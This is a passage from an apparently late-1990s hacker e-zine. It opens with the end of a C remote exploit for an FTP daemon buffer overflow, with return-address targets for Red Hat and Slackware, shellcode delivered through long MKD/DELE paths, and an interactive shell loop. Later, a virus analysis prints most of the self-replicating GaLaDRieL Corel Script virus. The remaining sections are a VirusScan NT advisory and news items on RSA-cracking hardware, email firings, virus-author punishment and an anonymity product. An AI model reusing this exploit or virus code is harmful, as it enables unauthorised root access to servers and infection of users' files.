0xb2ffe356, 3,-28, 1, "BETA-15 (redhat 5.0)", }, { 0xbfffebc5, 3, 0, 1, "BETA-15 (slackware 3.3)", }, { 0xbffff3b3, 3, 0, 1, "BETA-15 (slackware 3.4)", }, { 0xbffff395, 3, 0, 1, "BETA-15 (slackware 3.6)", }, { 0,0,0,0,NULL } }; struct options { char start_dir[20]; unsigned char *shellcode; unsigned char chroot; char username[10]; char password[10]; int offset; int t; } opts; /* Bit of a big messy function, but hey, its only an exploit */ int main(int argc,char **argv) { char *argv0,ltr; char outbuf[1024], inbuf[1024], ret_string[5]; int pwdlen,ctr,d; FILE *cin; int fd; struct in_addr victim; argv0 = strdup(argv[0]); *opts.username = *opts.password = *opts.start_dir = 0; opts.chroot = opts.offset = opts.t = 0; opts.shellcode = hellcode_a; while ((d = getopt(argc,argv,"cs:o:t:"))!= -1){ switch (d) { case 'c': opts.shellcode = hellcode_b; opts.chroot = 1; break; case 's': strcpy(opts.start_dir,optarg); break; case 'o': opts.offset = atoi(optarg); break; case 't': opts.t = atoi(optarg); if ((opts.t < 0)||(opts.t>5)) { printf("Dont have that type!\n"); exit(-1); } } } argc -= optind; argv += optind; if (argc < 3) usage(argv0); if (!resolv(argv[0],&victim)) { perror("resolving"); exit(-1); } strcpy(opts.username,argv[1]); strcpy(opts.password,argv[2]); if ((fd = tcp_connect(victim,21)) < 0) { perror("connect"); exit(-1); } if (!(cin = fdopen(fd,"r"))) { printf("Couldn't get stream\n"); exit(-1); } Fgets(inbuf,sizeof(inbuf),cin); printf("%s",inbuf); if (ftp_command(inbuf,331,cin,"USER %s\n",opts.username)<0) fatal("Bad username\n"); if (ftp_command(inbuf,230,cin,"PASS %s\n",opts.password)<0) fatal("Bad password\n"); if (*opts.start_dir) if (ftp_command(inbuf,250,cin,"CWD %s\n",opts.start_dir)<0) fatal("Couldn't change dir\n"); if (ftp_command(inbuf,257,cin,"PWD\n")<0) fatal("PWD\n"); if (parse_pwd(inbuf,&pwdlen) < 0) fatal("PWD\n"); srand(time(NULL)); printf("Making padding directorys\n"); for (ctr = 0;ctr < 4;ctr++) { ltr = rand()%26 + 65; memset(outbuf,ltr,194); outbuf[194]=0; if (ftp_command(inbuf,257,cin,"MKD %s\n",outbuf)<0) fatal("MKD\n"); if (ftp_command(inbuf,250,cin,"CWD %s\n",outbuf)<0) fatal("CWD\n"); } /* Make padding directory */ ctr = 124 - (pwdlen - types[opts.t].align);//180 //ctr = 152 - (pwdlen - types[opts.t].align); ctr -= types[opts.t].pad_shift; if (ctr < 0) { exit(-1); } memset(outbuf,'A',ctr+1); outbuf[ctr] = 0; if (ftp_command(inbuf,257,cin,"MKD %s\n",outbuf)<0) fatal("MKD\n"); if (ftp_command(inbuf,250,cin,"CWD %s\n",outbuf)<0) fatal("CWD\n"); memset(outbuf,0x90,195); d=0; for (ctr = RET_POS-strlen(opts.shellcode);ctr<(RET_POS);ctr++) outbuf[ctr] = opts.shellcode[d++]; double_up(types[opts.t].ret_address-opts.offset,ret_string); strcpy(outbuf+RET_POS,ret_string); strcpy(outbuf+RET_POS+strlen(ret_string),ret_string); printf("Press any key to send shellcode...\n"); getchar(); if (ftp_command(inbuf,257,cin,"MKD %s\n",outbuf)<0) fatal("MKD\n"); if (types[opts.t].overflow_type == 1) if (ftp_command(inbuf,250,cin,"DELE %s\n",outbuf)<0) fatal("DELE\n"); /* HEH. For type 1 style we add a dele command. This overflow occurs in delete() in ftpd.c. The cause is realpath() in realpath.c not checking bounds correctly, overwriting path[] in delete(). */ RunShell(fd); return(1); } void RunShell(int thesock) { int n; char recvbuf[1024]; fd_set rset; while (1) { FD_ZERO(&rset); FD_SET(thesock,&rset); FD_SET(STDIN_FILENO,&rset); select(thesock+1,&rset,NULL,NULL,NULL); if (FD_ISSET(thesock,&rset)) { n=read(thesock,recvbuf,1024); if (n <= 0) { printf("Connection closed\n"); exit(0); } recvbuf[n]=0; printf("%s",recvbuf); } if (FD_ISSET(STDIN_FILENO,&rset)) { n=read(STDIN_FILENO,recvbuf,1024); if (n>0) { recvbuf[n]=0; write(thesock,recvbuf,n); } } } return; } int double_up(unsigned long blah, char *doh) { int a; unsigned char *ptr,*ptr2; bzero(doh,6); ptr=doh; ptr2=(char *)&blah; for (a=0;a<4;a++) { *ptr++=*ptr2; if (*ptr2==0xff) *ptr++=0xff; ptr2++; } return(1); } int parse_pwd(char *in, int *pwdlen) { char *ptr1,*ptr2; /* 257 "/" is current directory */ ptr1 = strchr(in,'\"'); if (!ptr1) return(-1); ptr2 = strchr(ptr1+1,'\"'); if (!ptr2) return(-1); *ptr2 = 0; *pwdlen = strlen(ptr1+1); /* If its just "/" then it contributes nothing to the RET_POS */ if (*pwdlen==1) *pwdlen -= 1; printf("Home Dir = %s, Len = %d\n",ptr1+1,*pwdlen); return(1); } int tcp_connect(struct in_addr host,unsigned short port) { struct sockaddr_in serv; int fd; fd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); bzero(&serv,sizeof(serv)); memcpy(&serv.sin_addr,&host,sizeof(struct in_addr)); serv.sin_port = htons(port); serv.sin_family = AF_INET; if (connect(fd,(struct sockaddr *)&serv,sizeof(serv)) < 0) { return(-1); } return(fd); } int ftp_command(char *buf,int success,FILE *out,char *fmt,...) { va_list va; char line[1200]; int val; va_start(va,fmt); vsprintf(line,fmt,va); va_end(va); if (write(fileno(out),line,strlen(line)) < 0) return(-1); bzero(buf,200); while(1) { Fgets(line,sizeof(line),out); #ifdef DEBUG printf("%s",line); #endif if (*(line+3)!='-') break; } strncpy(buf,line,200); val = atoi(line); if (success != val) return(-1); return(1); } void fatal(char *string) { printf("%s",string); exit(-1); } char *Fgets(char *s,int size,FILE *stream) { char *ptr; ptr = fgets(s,size,stream); //if (!ptr) //fatal("Disconnected\n"); return(ptr); } int resolv(char *hostname,struct in_addr *addr) { struct hostent *res; if (inet_aton(hostname,addr)) return(1); res = gethostbyname(hostname); if (res == NULL) return(0); memcpy((char *)addr,(char *)res->h_addr,sizeof(struct in_addr)); return(1); } int usage(char *program) { fprintf(stderr,"Usage: %s [-c] [-s start_dir]\n",program); fprintf(stderr,"\t[-o offset] [-t type]\n"); fprintf(stderr,"types:\n"); fprintf(stderr,"0 - %s\n", types[0].name); fprintf(stderr,"1 - %s\n", types[1].name); fprintf(stderr,"2 - %s\n", types[2].name); fprintf(stderr,"3 - %s\n", types[3].name); fprintf(stderr,"4 - %s\n", types[4].name); fprintf(stderr,"5 - %s\n", types[5].name); fprintf(stderr,"\n"); exit(0); } /* -EOF- */ @HWA 44.0 VirusScan NT advisory from Simple Nomad ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Content-Type: TEXT/PLAIN; charset=US-ASCII Message-ID: Date: Thu, 29 Oct 1998 20:01:56 -0600 Reply-To: Simple Nomad Sender: Bugtraq List From: Simple Nomad Subject: NAI AntiVirus Update Problem To: BUGTRAQ@netspace.org _______________________________________________________________________________ Nomad Mobile Research Centre A D V I S O R Y www.nmrc.org Simple Nomad [thegnome@nmrc.org] 05May1999 _______________________________________________________________________________ Platform : Microsoft NT 4.0 Application : Network Associates' VirusScan NT Severity : Medium Synopsis -------- Network Associates VirusScan NT (formerly McAfee VirusScan NT) version 4.0.2 does not properly update virus signature definition files under certain conditions, and will falsely report it is up to date during manual updates. This impacts both NT Server and Workstation. Tested configuration -------------------- Microsoft NT Server 4.0 w/SP3, Network Associates VirusScan NT version 4.0.2. Microsoft NT Workstation 4.0 w/SP3 and SP4, Network Associates VirusScan NT version 4.0.2. Pre-4.0.2 versions of VirusScan NT were not tested, nor were versions for other platforms, such as Windows 95 or 98. Bug(s) report ------------- Network Associates VirusScan NT has a feature that allows for a user to update the virus definitions file via ftp. This task can also be automated via the VirusScan NT AntiVirus Console. In version 4.0.2, the scan engine holds open the main definition file scan.dat (located in the VirusScan NT directory) during the ftp process, preventing the file from being overwritten with the new version. The engine itself apparently does not check return codes and will not notify the user that the file was not updated. Worse, the Application Log is updated as if the install completed properly, therefore subsequent downloads of new definition files will not update the scan.dat properly. Subsequent manual downloads will in fact tell you that you already have the latest definition file when in fact you do not. NMRC was not able to make this error occur consistently, and we strongly suspect that a race condition exists where the updates will occasionally work, but we were able to duplicate the error condition most of the time. Testing was done in NMRC labs, and at two corporate locations. To verify the proper definitions file, check the About box from the AntiVirus Console program for the latest date next to the text "Created On". If after a manual or automatic update this date does not change, your definitions have not been properly updated. The implication here is that the administrator or end user believes their system is protected when it in fact is not. Solution/Workaround ------------------- Upgrade to Network Associates VirusScan NT version 4.0.3a, which resolves the problem. Alternately, disable the VirusScan engine, wait several seconds for the operating system to close the file, and manually copy the definition files into the VirusScan NT directory. This second method will place your log files out of sync with the definition files until the next manual or automatic download, but this should not impact functionality. It is recommended that you disable 4.0.2 (or even uninstall) before performing an upgrade to 4.0.3a due to other problems we encountered during the testing of this product, such as being unable to properly stop the VirusScan services before upgrading. Once again, these problems were inconsistent but happened several times on several systems. One further note, in a restricted NT workstation environment, it is next to impossible to have the user upgrade the product themselves. Local admin rights are required to make this happen, and this will require a visit from an individual with adequate rights to the workstation to complete the upgrade. Comments -------- Network Associates has been notified and recommend the upgrade to 4.0.3a to resolve the problem. This problem was discovered while investigating why upgraded machines were still infected by various Microsoft Word macro virii after they had been upgraded to the latest definition files. Network Associates can be reached at http://www.nai.com/. Unfortunately at the time of this writing the ftp location of the 4.x definition files was not present. It's supposed to be at ftp://ftp.nai.com/pub/antivirus/update/4.x but had disappeared from the server(s). _______________________________________________________________________________ Simple Nomad // thegnome@nmrc.org // ....no rest for the Wicca'd.... www.nmrc.org // @HWA 45.0 New CorelDraw Virus ~~~~~~~~~~~~~~~~~~~ From http://www.403-security.org/ CorelDraw virus found Astral 07.05.1999 17:15 HispaSec discovred virus in CorelDraw.This is first virus based on CorelDraw Script.Virus is named GaLaDRieL.Once this virus gets in your computer it affects files by adding victima$ label in CSC file once added also adds yo_estoy_en$ label in same CSC file and after both labels are added it modifies LothLorien label.More about it on HispaSec. 6-5-1999 - HispaSec discovers the first virus for Corel Draw We introduce "GaLaDRieL", the first virus ever based on Corel Script, the computer language designed for Corel Draw's task and script automation. Albeit its effects are not harmful, we're undoubtedly dealing with an innovation in the macro virus area which may open a new way of development. Corel Script is the language, based upon the popular BASIC, designed for macro coding in the Corel pack. A macro is a computer program which runs a series of instructions so as to automate repetitive tasks, or to simplify complex actions, as well as to ask for entries, view messages or to swap information with other applications. This is what Corel Draw calls "scripts", a kind of files with "CSC" as extension, which are the victims of this new brand virus. In the first line of its code we can find the virus identification: name, author, and virus writing group its author belongs to. --------- REM ViRUS GaLaDRieL FOR COREL SCRIPT bY zAxOn/DDT --------- After this, the virus gets the system date and checks whether it coincides with june 6th of any year. When this happens, the virus jumps to a label called "Elessar", where its payload can be found, which consists on displaying an excerpt from "The Lord Of The Rings". Anyhow the program eventually jumps to a label called "Palantir". --------- fecha$=GetCurrDate () If Left(fecha$,1)="6" Then If Mid(fecha$,3,2)="06" Then Goto Elessar Goto Palantir Elessar: Mensajito$= " Ai! lauri� lantar lassi s�rinen!. Y�ni �n�time ve r�mar aldaron, y�ni ve linte yuldar v�nier mi oromardi lisse-miruv�reva And�ne pella Vardo tellumar nu luini yassen tintilar i eleni �maryo airet�ri-lirinen. ...." Titulo = "GaLaDRieL ViRUS bY zAxOn/DDT" Messagebox Mensajito$,Titulo,64 ---------- The virus looks for the first file containing the "CSC" extension (Corel Script) with the attributes 32 or 128, which stand for normal files. When it finds such a victim, the virus opens it for reading and checks for the text string "REM ViRUS", which determines whether the file has been previously infected. When it finds a suitable victim according to its own features, then assings the file name to the variable called "victima$". ---------- Palantir: nombre$=FindFirstFolder ("*.csc",32 or 128) Do while not nombre$="" Open nombre$ For Input As #1 Palacios_Intemporales: Line Input #1,linea$ If linea$="" then goto Palacios_Intemporales if victima_bool=1 Then Goto Esgaroth If Instr(linea$,"REM ViRUS",1)=0 then victima$=nombre$ victima_bool=1 End if ----------- The virus then keeps on looking for files fitting its search wildcard ("CSC" extension and attributes 32 or 128, by means of the "FindNextFolder()" instruction). When the virus finds an infected file through this second search, it proceeds to store its file name into the "yo_estoy_en$" variable. Once both the victim ("victima$") and the already infected file ("yo_estoy_en$") are ready, the virus jumps to a label called "LothLorien". For those cases in which the virus is not able of finding any of the two files mentioned above, the virus skips the infection process and jumps to a new label, called "Los_Puertos_Grises". ----------- Esgaroth: If Instr(linea$,"REM ViRUS",1)<> 0 Then yo_estoy_en$=nombre$ conocimiento=1 End if Close If conocimiento=1 Then If victima_bool=1 Then Goto LothLorien nombre$=FindNextFolder () If nombre$="" Then Goto Los_Puertos_Grises Loop ----------- In its last stage we have the chance to find a rather peculiar, bad optimized, way of infecting the victim file with the virus body. The first step consists on deleting a temporal file called "mallorn.tmp", which might be found in the system because of previous infections. It renames then the victim file to "mallorn.tmp", by means of the instruction "Rename victima$,"mallorn.tmp",0". The last parameter ("0") indicates that in those cases in which the "mallorn.tmp" file would already exist (even though it was supposed to have been previously deleted by the virus itself) it would be overwritten. This is just a small example of the poor code optimization of the infection routine. After having performed the above operations, the virus opens the file specified by the "yo_estoy_en$" variable for reading and then the one pointed to by "victima$" for writing. After this, and by means of a loop, GaLaDRieL parses its code, line by line, until reaching the "REM END" string, which tells the virus the process is done. It closes then both files and reopens the victim file, this time in "Append" mode, in order to attach, by means of this method, the code lines which belong to the original script code, previously saved to the "mallorn.tmp" file. Eventually the virus deletes one more time the temporary file, and the last thing we find in its code is the text line we've just talked about, the one which tells GaLaDRieL where the tail of the virus body is located at. ----------- LothLorien: Kill "mallorn.tmp" Rename victima$,"mallorn.tmp",0 Open yo_estoy_en$ For Input As #1 open victima$ For Output As #2 Do While Not Left(linea$,7)="REM END" Line Input #1,linea$ Print #2,linea$ Loop Line Input #1,linea$ Print #2,linea$ Close Open victima$ For Append As #1 Open "mallorn.tmp" For Input As #2 Do While Not Eof(2) Line Input #2,linea$ Print #1,linea$ Loop Close Kill "mallorn.tmp" Los_Puertos_Grises: REM END OF ViRUS GaLaDRieL bY zAxOn/DDT ------------ There's no doubt about the fact that we're talking about a virus which won't travel too far, something to which we could add its poor code optimization. >From this, it's not difficult to guess that its author's purpose was to show the viability of developing viruses in this new environment, leaving back other kinds of more commonly infected victims. Suming up, we're dealing with an innovating virus in which concerns to the platform it's designed to work in, and that it can mean the begin of a new macro virus family for Corel Draw. Bernardo Quintero @HWA 46.0 TWINKLE, the number crunching machine to attack RSA keys ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.projectgamma.com/ http://www.projectgamma.com/news/16.html Twinkle: The Magic Light That Breaks The Code May 6, 1999, 22:45 Author: i_am_online Twinkle and you're done, the magic light that breaks the code. Computer scientist Adi Shamir who is a co-creator of the RSA public key algorithm has developed a computer that is light based and that can decode data to an extent far past what is normally used in e-commerce. Its name is �Twinkle,� and Adi Shamir this Tuesday in Prague demonstrated it at the 1999 Eurocrypt conference. Twinkle can find the correct key, efficiently, for decrypting messages that have been encrypted with 512-bit keys, said Shamir. The Twinkle design goes with prior expectations about the consequence of RSA keys as long as 512 bits. But key sizes larger are still out of reach aside Shamir's progress in code breaking. What Twinkle stands for is "The Weizmann Institute Key Locating Engine." Twinkle is very different than that of the electronic design of a normal computer; Twinkle is based solely on optoelectronics, which use light to transfer info digitally. Shamir predicts that the Twinkle mechanism would be as effective as about 100 to 1,000 PCs. Not just that, but the machine could be easily built with little funding, Shamir says that a Twinkle machine could be built for as little as $5,000. On the other hand the DES Cracker cost the Us government $250,000 to build. This report was partly contributed by Wired Related Links: Wired News http://www.wired.com/news/news/technology/story/19493.html RSA http://www.rsa.com ZDNN Indirectly Related http://www.zdnet.com/zdnn/stories/news/0,4586,2254799,00.html Wired; The Light That Cracks the Code by Chris Oakes 5:00 p.m. 4.May.99.PDT A computer scientist has designed a light-based computer that could unscramble data to a degree well beyond that typically used in e-commerce. "Twinkle," a yet-to-be-built crypto-cracking machine, was introduced Tuesday by famed computer scientist Adi Shamir at the Eurocrypt '99 conference in Prague. Shamir's Twinkle proves an oft-repeated point: To adequately hide electronic information from prying eyes, data needs to be locked up beyond the limits of technology in common use today. The strength of a given cryptography scheme is expressed in the number of bits in the "key" required to unlock the code. For example, popular encryption programs used in the United States support the equivalent of 1024- to 2048-bit security. Each additional bit doubles the strength of the cipher from trial-and-error attacks. Twinkle can quickly determine the correct key for unlocking messages that have been encrypted with 512-bit keys, said Shamir, who is also co-inventor of the RSA public-key algorithm -- a de facto standard for Internet security. "[This] remind[s] people that yes, what the experts have been saying about key size is really the case," said Burt Kaliski, chief scientist at pioneer encryption company RSA Data Security, which built its business around the encryption algorithm. Kaliski said the Twinkle design confirms previous expectations about the appropriateness of RSA keys as long as 512 bits. But he emphasized that larger key sizes are still out of reach despite Shamir's advance. "The primary impact [of Twinkle] is that it makes 512-bit keys for RSA more at risk than was previously considered," said Kaliski. "It will have a similar effect to the Deep Crack machine." Deep Crack is a specially designed supercomputer that in July 1998 first cracked the level of encryption used to secure most nonclassified government data. In January 1999, with an Internet-wide volunteer computer effort and the Electronic Frontier Foundation behind the project, Deep Crack unlocked a message secured with the 56-bit Data Encryption Standard -- the equivalent of a 384-bit RSA key -- in a mere 22 hours and 15 minutes. Deep Crack was designed to send a message to the US government that the strongest data-scrambling technology legally allowed to leave American shores is no longer strong enough to be useful. Public-key cryptography is secure because it hinges on a mathematical truth -- it's very difficult to find two prime factors of another known number. The Twinkle machine would greatly accelerate the process of collecting equations, which is the first step in factoring a large number. This step, known as "sieving," is a key to deciphering an RSA-encrypted message. The second step in the factoring process entails calculating the equations once they are collected, and it is the main method for determining an RSA key. Twinkle stands for "The Weizmann Institute Key Locating Engine." Unlike the purely electronic design of the conventional computer, Twinkle is based on optoelectronics, which uses light to transmit digital information, similar to the way fiber-optic cables rely on light instead of electrical impulses over copper wire to transmit signals. Shamir estimates that the device would be as powerful as about 100 to 1,000 PCs in the factoring process. Further, the machine could be easily built with little funding. While the DES Cracker cost US$250,000 to construct, a Twinkle machine could be built for as little as $5,000, he said. Bruce Schneier, president of cryptography firm Counterpane Systems said Shamir has come up with a very clever approach to an academic problem. "This is brilliant, really brilliant stuff," Schneier said. "Once you read the paper it's extremely obvious. There's a lot of engineering between the paper and reality. But it's certainly doable. Nothing [in the design] is insurmountable." The significance of Twinkle is mathematical, rather than a political statement about encryption, Schneier said. "This is academic research." Encryption expert Matt Blaze, an encryption researcher at AT&T Labs, said Twinkle doesn't change the theoretical strength of the RSA encryption algorithm. But "if Twinkle's approach turns out to be practical it will force us to reconsider the appropriate minimum length of RSA keys." Blaze does see potential political repercussions from Shamir's advance. "If Twinkle is practical, it would provide a similar demonstration of the weakness of the public key systems allowed for export." Will anyone seek to build a machine based on Twinkle? No doubt, Schneier said. "If you were a government and your business is learning what other governments are saying, you'd be a fool not to build this machine. I'm sure the [National Security Agency] is studying it very carefully." @HWA 47.0 25 fired due to e-mail abuses ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.net-security.org/ 25 FIRED BECAUSE OF E-MAIL ABUSE by BHZ, Saturday 8th May 1999 on 2:39 pm CET About 25 employees who used electronic mail for non-business reasons have been fired at Edward Jones, successfully brokerage firm. Spokeswoman from the firm didn't share information about what did they actually do, but she said: "It is not acceptable to use the Internet for nonbusiness-related purposes. Read the article below http://www.postnet.com/postnet/stories.nsf/86964efc7e86f67886256743007c8f4b/a118a96450a70b548625676a00385c01?OpenDocument Brokerage firm here fires 25 for e-mail abuse By Paul Hampel Of the Post-Dispatch About 25 employees who used electronic mail for non-business reasons have been fired at Edward Jones, a spokeswoman for the brokerage firm said Thursday. Besides last week's firings, another 48 employees were suspended, said one employee, who asked not to be identified. "When people get Internet access at Edward Jones, they know the policy of the firm," said Mary Beth Heying, a spokeswoman for the company. "It is not acceptable to use the Internet for nonbusiness-related purposes." She refused to say specifically why the employees were disciplined, what the company's e-mail policies are and how the disciplined employees had violated them. Several employees who spoke anonymously said they understood that some of the infractions involved off-color jokes. "E-mail goes through the Internet," Heying said. "So, generally speaking, we're talking about people whose employment was terminated for Internet abuse." The company, which has its headquarters here, issued a memo on April 27 that instructed employees who had sent e-mails containing pornography or off-color jokes to report to the personnel office by April 29, one employee said. Like all the Edward Jones employees interviewed for this story, the employee asked that his name not be used. The day after the memo was circulated, the personnel department was jammed with people wondering if they had violated the policy, said the employee. "Nothing got done last week at Edward Jones," he said. "Everyone was freaked out." Heying issued a statement on behalf of the company that said: "We at Edward Jones have zero tolerance with regard to Internet abuse. This policy has been clearly communicated to our associates. "Although we cannot comment on specific situations, we have a responsibility to provide our nearly 14,000 associates a workplace free from Internet abuse." Heying said the firings were confined to the 2,300 employees distributed among the three campuses that make up the company's international headquarters. They're located in Maryland Heights, in Maryville Center in West County and in Des Peres. The brokerage firm - which Heying said was the world's ninth largest - also operates 5,000 branch offices across the country, as well as in Canada and the United Kingdom. The firings did not affect the branches, she said. Employees interviewed Thursday afternoon on the parking lot at the Maryland Heights campus at 201 Progress Parkway said rumors were circulating that the number of people fired was higher than Heying's estimate. Some saw a rainbow in the firings. "This is awful to say, but the firing could actually be good news for me," said one young employee. "It could mean I'll move up in this company." Another employee, a woman, said she had heard that some of those fired had been sending dirty jokes to one another. "All the big companies seem to be firing people for sending dirty e-mails," she said. " It's happened the last two or three places I've worked." A former Edward Jones employee, who left to pursue other business interests, said the company zealously monitored employee communications. "Edward Jones is the most technologically advanced firm I've ever seen," said the man. "They monitor telephone calls and e-mails. They are able to track everything." @HWA 48.0 Punishment CIH vs MELISSA ~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.net-security.org/ PUNISHMENT by BHZ, Saturday 8th May 1999 on 2:33 pm CET SF Gate published an article about two actual virus cases: David Smith's (Melissa creator) and Chen Ing-hau's (CIH creator). They do some parallels between them, and from it some strange things could be seen. CIH virus was more destructive (because it deletes all data), but its creator was just suspended from his university. David Smith could get up to 40 years of imprisonment. Read the article below; http://www.sfgate.com/technology/expound/ Stopping The Deadly Virus Punishment won't cure this ill Neil McAllister, Special to SF Gate Perhaps the only thing more frustrating than the damage caused by viruses is the realization that one has very little recourse when they do strike. They're a hit-and-run by an unknown assailant. No wonder Melissa virus creator David Smith's arrest and pending trial is viewed by many with such pernicious glee. For once, it seems, one of these faceless delinquents will be brought to justice, and get what he deserves. Compare Smith's case with that of Taiwanese information engineer Chen Ing-hau. Taipei authorities recently fingered the 24-year-old man as responsible for the highly damaging CIH, or "Chernobyl" virus -- so named because it strikes on anniversaries of the April 26, 1986 Soviet nuclear disaster. Chernobyl's last outbreak erased data on tens of thousands of computers worldwide, rendering many unusable. But while David Smith could potentially land more prison time than some repeat rapists, the only punishment Ing-hau has received to date for his role in creating the virus has been a demerit from the Tatung Institute for Technology, where he studied computer science. That was over a year ago. Unlike Melissa, it seems Chernobyl's victims have very little hope of restitution for data lost to the virus. So while there may be an opportunity to finally make an example of David Smith, I question whether slapping a programmer with a 40-year sentence will really contribute much to ending the threat of malicious software. Before we go blindly locking away virus authors, maybe we should first examine their motives. First an admission: David Smith and I have something in common. Perhaps my life of crime eventually might have landed me in the same spot in which Smith now finds himself -- had I maybe been just a little bit better at it. Melissa wreaked havoc on networks nationwide in March, using a combination of Microsoft's Word and Outlook software for Windows to spread copies of itself rapidly across the Internet, via email. The resulting flood of messages soon choked afflicted mail servers, rendering them incapable of processing genuine email as they struggled beneath the load of Melissa-generated mail. It was the first big virus outbreak of 1999. My own career in computer virus authoring ended years ago, before there was much of an Internet, and when MS-DOS was the PC operating system of choice. Dubbed Leprosy-B, my last (and somewhat ineffectual) virus was the follow-up to a similarly timid program I'd written earlier, called (predictably enough) Leprosy. About 10 minutes after putting the finishing touches on Leprosy-B, I accidentally let it loose on my own hard drive. It promptly infected half my development tools and a random number of system files, before I could get it in check. As I embarked on a long night of re-installing infected software, I got my first real taste of what a royal pain in the ass computer viruses can be. As a teenager, crippling entire computer networks worldwide was the farthest thing from my mind as I toiled late nights writing the Leprosy virus. For one thing, I just wasn't skilled enough a programmer to pull off such a feat -- but it was a lot easier to write a tiny virus program than a huge application, like a word processor. Today, even complete novices can create their own computer virus with the help of one of the several "virus construction kits" available for download from some hacker sites on the 'Net. Most virus software, in fact, remains no great wonder, relying on a small number of instructions to achieve a few clever tricks. It's generally a fluke when one manages to travel as widely and achieve its goal as successfully as Chernobyl or Melissa. While some virus outbreaks might accurately be categorized as industrial espionage, most virus authors seek little more for their efforts than a certain kind of notoriety within the computing underground. Getting your virus out into public circulation is a little like spray painting your name on walls: It's a way to gain recognition amongst your peers. But while most graffiti taggers might hesitate before defacing the ceiling of the Sistine Chapel, viruses generally make no distinction about which systems they destroy. Since most virus attacks tend to be executed with all the cunning of throwing eggs at a passing car, maybe the solution lies elsewhere besides prosecuting the authors of these tiny terrors. Maybe it's time we addressed the issue of what makes viral software possible to begin with. As the number of computer viruses has grown over the years, a cottage industry of anti-virus software has appeared to combat the problem. We regularly hear about anti-virus software causing various crashes and conflicts with other programs. None of these packages, however, does very much to strike at the root cause of computer viruses -- the vulnerability of the operating system itself. Sun Microsystems had the right idea with the "sandbox" security model of its Java language. Java applets downloaded from an untrusted source on the Web aren't allowed access to most of the OS features that would allow a virus to spread. Sun realized that the creation of a globally networked computer environment meant new security measures had to be developed to protect users from all their new neighbors. It's an idea as simple as installing a deadbolt on your front door. Contrast Sun's ideas to Microsoft's, whose decision to build a complete programming language into its word processor without any significant security measures spawned an entire new subcategory of Macro Viruses -- now one of the most commonplace forms of viruses encountered. Melissa itself fell into this category. Further, Microsoft's ActiveX technology for the Web can allow viral code to run virtually unchecked on a Windows computer directly over the network. I'm not about to say David Smith shouldn't be held responsible for damages caused by Melissa should he be found guilty of creating and releasing that virus. But I also feel it's the responsibility of software manufacturers to adapt to the vulnerabilities of today's networked computing model by creating secure software environments for us to work in. The technology exists; it's only a matter of making an effort to deploy it. Try asking your operating system vendor sometime what steps they're taking to protect you from attack by hostile software. If the answer you get is that they're helping to prosecute David Smith, don't buy it. Today there are hundreds of David Smiths worldwide, and a new David Smith is born every day. There's only one Microsoft. Can't they do any better than to point the finger? @HWA 49.0 World of freedom: An interview with Zero Knowledge Systems, by BHZ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.net-security.org/ WORLD OF FREEDOM IS COMING by BHZ, Friday 7th May 1999 on 3:23 pm CET Privacy. The word which is often in the news. Is Big Brother watching? Well if he is, then he is finished. New program, called Freedom will change it all. It will base on new Freedom network (world's ISPs join forces on this matter). Read here on HNS, exclusive interview with Jordan Socran from Zero-Knowledge Systems, company behind Freedom. See how will you be able to surf, chat and use e-mail 100% anonymously. So read the interview in our Special Report. Special Report; http://www.net-security.org/spec/zks/index.htm If you may know, because many news sites wrote about Freedom, this new program will secure us in the future. What is Freedom? How will it work? Why the company has been "attacked" by Intel? Find the answers in exclusive interview with Jordan Socran, manager of partnership programs for ZKS. With Freedom to 21st century ZKS is a famous company now, when was it founded and with what plans? ZKS is founded in 1997 to provide Net users with a way to protect their privacy online. Plans are to offer users the ability to set up and manage multiple digital identities that they can use online. This way they can enjoy all the benefits of the Net without sacrificing their privacy. We wanted to let people enjoy the privacy they have in the physical world on the Internet. Freedom is the way they can. Freedom is first project created by ZKS? Yes. We are scheduled to release the beta later this month and Freedom 1.0 later this summer. Freedom is the only thing we are working on since ZKS was started. In the future, we plan on releasing Freedom for kids, to protect children online as well as a version of Freedom that can be used on an Intranet, i.e. behind a firewall. This current version is for personal use only. On what basis Freedom works? We invented a technology we are calling PIP - Privacy Enhanced Internet Protocol. We looked at all the current remailing technologies, etc, including onion-routing, Penet.fi and many others. We have figured out a way to go beyond these systems to maximize the efficiency of anonymous re-routing and strong crypto. Freedom removes identifying information, encrypts data packets multiple times and routes them through a series of Freedom Servers, hosted by ISP's around the world. You made big marketing for Freedom, many sites have Freedom buttons for several months... We have actually done very little marketing. We have not spent any money promoting Freedom. We have received a lot of press due to the nature of our product and people all over the world have communicated with one another without ZKS intervention. The sites of people with buttons - these people have found us :) But you have affiliates, which can earn money if visitors from their site buy a copy of freedom? Yes. we now have over 1000 ! :) The difference is that these people believe in the cause, not just the money. We want to give the power back to the people, that is why we say that Freedom empowers . We want to make a change. We are NOT just out to make $$$ Well to people privacy is very important. On your opinion, will Freedom become the best and most famous of all security solutions? Maybe, maybe not - the people will decide. We will release Freedom for the people that need it most. The people in Human Right organizations, people in countries where the gov't doesn't let them enjoy the Internet, people who wish to be private on the Net. We hope other companies will begin to offer solutions as well that help the people do this. Will Freedom be the most secure? We will see. It is a dangerous thing to offer partial security... On what operating systems will Freedom run? This version is for Windows only. We will be looking at other platforms as soon as we release to port the client to - i.e. Linux, Mac, etc. We hope to one day go open source... Freedom network So when someone buys Freedom, how is the program reacting to hide the real identity of the customer? We use a double-blind registration process. the download is free. You can download Freedom as many times as you wish - at home, at work, etc. You then go online to buy tokens. Each token can be redeemed to activate one pseudonym (nym) on the Freedom Network for a 12 month period. The token is just a serial number. We have created a pool of millions of tokens. When you buy a token, you pull it out of the token pool. We do not know which token you received. Our server checks to see if it is a valid token but we don't know who received the token. So client with installed Freedom program connects to Freedom network. It is all crypted... So how fast is it then? We have overcome many of the slowdowns that using strong crypto would bring. Users in North America will not notice a slowdown. In Europe, it will depend on where you are and how many ISP's are running Freedom Servers in your area. Where the Internet backbone is strong, Freedom will be faster. So how many ISPs are connected into Freedom network? Right now 50 ISP's on 4 continents - Australia, Austria, Canada, Japan, Netherlands, UK and the United States And what are the plans, to enlarge your network? We are promoting the Freedom Server program by advertising to ISP's, online, at conferences, etc. Many ISP's have heard 